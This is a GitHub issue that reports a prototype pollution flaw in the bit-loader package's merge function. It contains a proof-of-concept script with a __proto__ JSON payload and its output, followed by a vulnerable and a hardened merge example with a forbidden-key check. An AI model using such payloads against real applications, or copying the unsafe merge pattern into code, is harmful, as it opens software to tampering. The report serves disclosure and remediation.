MiguelCastillo / bit-loader

Framework for building module loaders with very little effort
MIT License

Prototype Pollution Affecting loader@10.0.3 module #404

Open mestrtee opened 8 months ago

mestrtee commented 8 months ago

Overview

Affected versions of this package are vulnerable to Prototype Pollution, where merge is invoked unsafely in the M function. Since the infected e argument with a __proto__ object is missing a check for whether it resolves to the object prototype, the malicious property is then copied onto the Object prototype by the merge operation to the empty object, recursively affecting all the objects in the program.

PoC

(async () => {
  const lib = await import('@bit/loader');

  // Payload whose "__proto__" key is parsed as an own property by JSON.parse
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  // Unrelated object used to observe whether Object.prototype was modified
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default(BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up so the rest of the process is not affected
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Refer to the recommendations in this article Snyk.io
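The following is an added example illustrating the prevention advice above; it is not bit-loader's code and does not show how the library's M function is implemented. `naiveMerge` is a hypothetical recursive merge of the kind the report describes, placed beside a hardened `safeMerge` that refuses the `__proto__`, `constructor` and `prototype` keys and only recurses into properties the target itself owns. `findForbiddenKeys` is a validation alternative that lets a caller reject and log a suspicious payload instead of silently dropping keys. All function names, `FORBIDDEN_KEYS` and the payload are constructed for this example.

```javascript
'use strict';

// Keys that must never be copied from untrusted input into a target object.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

function isPlainObject(value) {
  if (value === null || typeof value !== 'object' || Array.isArray(value)) return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Hypothetical naive recursive merge (not bit-loader's implementation): it
// copies every enumerable key, so a "__proto__" key in `source` makes the
// recursion descend into Object.prototype and write the attacker's values there.
function naiveMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isPlainObject(value)) {
      if (!isPlainObject(target[key])) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: own keys only, forbidden keys skipped, and recursion only
// into properties the target itself owns (never inherited ones).
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Validation alternative: return the dotted paths of every forbidden key in
// the input so the caller can reject the whole payload and log the attempt.
function findForbiddenKeys(input, path = '') {
  const found = [];
  if (!isPlainObject(input)) return found;
  for (const key of Object.keys(input)) {
    const here = path ? `${path}.${key}` : key;
    if (FORBIDDEN_KEYS.has(key)) found.push(here);
    found.push(...findForbiddenKeys(input[key], here));
  }
  return found;
}

// Constructed payload with the same shape as the one in the report.
const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');

// Runs both merges against fresh targets and reports whether an unrelated
// object picked up `polluted`. Object.prototype is cleaned up afterwards.
function demo() {
  const result = {};
  try {
    naiveMerge({}, BAD_JSON);
    result.naivePollutes = ({}).polluted === true;
  } finally {
    delete Object.prototype.polluted;
  }
  safeMerge({}, BAD_JSON);
  result.safePollutes = ({}).polluted === true;
  result.forbiddenPaths = findForbiddenKeys(BAD_JSON);
  return result;
}

console.log(demo()); // { naivePollutes: true, safePollutes: false, forbiddenPaths: [ '__proto__' ] }
```

Note that `JSON.parse` produces an own property literally named `__proto__`, which is why `Object.keys` sees it and why an object literal (`{ __proto__: ... }`) cannot be used to reproduce the payload: in a literal that key sets the prototype instead.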

mestrtee commented 8 months ago

Any updates on this issue?